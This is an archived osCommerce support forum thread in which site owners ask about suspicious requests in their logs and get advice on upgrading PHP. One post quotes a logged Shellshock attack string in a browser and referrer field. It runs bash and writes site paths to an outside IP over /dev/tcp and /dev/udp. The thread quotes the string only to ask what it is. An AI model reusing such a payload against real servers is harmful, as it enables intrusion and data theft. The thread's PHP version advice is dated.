Jump to content

Archived

This topic is now archived and is closed to further replies.

drillsar

What is this person doing?

Recommended Posts

I installed http error log and noticed a couple of people keep going to find this file:

 

/images/thumbnails/160/160/product/1/yhst-129599579720997_2272_101803540.jpg

 

and it doesnt exist? They trying to hack or what?

Share this post


Link to post
Share on other sites

Look at the IP and see where the request is coming from. You could have issues in your codes, or there can be bad links that you cannot control. There aren't much to hack with that link...

Share this post


Link to post
Share on other sites

I have installed supertracker  and i  find this...

Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"

Referred By: /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?" target="_blank">() { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?

 

where mysitexxxx = my site

 

with 3 different ways  maybe try of hacking?

Share this post


Link to post
Share on other sites

@@rory1  That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran".

 

My bet is that it's a hack attempt, or trying to get information for one.

 

Regards

Jim


See my profile for a list of my addons and ways to get support.

Share this post


Link to post
Share on other sites

If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that?

 

You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher.

 

Regards

Jim


See my profile for a list of my addons and ways to get support.

Share this post


Link to post
Share on other sites

PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version.

 

Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5.

 

Regards

Jim


See my profile for a list of my addons and ways to get support.

Share this post


Link to post
Share on other sites

@@kymation - good to know about the php 5.5.  I have noticed there seems to be an ability to select options json, soap, pdf.  Would anyone know of a useful link for what should be turned on?  Or even one that talks about security in php 5.5.

 

-BP

Share this post


Link to post
Share on other sites

Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc.

 

PHP 5.5 is still being actively maintained, so I think it is pretty safe.

 

Regards

Jim


See my profile for a list of my addons and ways to get support.

Share this post


Link to post
Share on other sites

Thank you kymation,
 
   I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc.

 

As I am looking at around 100+ of such things.  I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just a admin interface now for turning on and off items?

 

This ability wasn't present with the older versions on my host so it go me to wondering if 5.5 has a special focus to ensure better security.

It also got me curious what would be relevant for security or functionality for osCommerce.  I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet.  Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose.

 

-BP

Share this post


Link to post
Share on other sites

×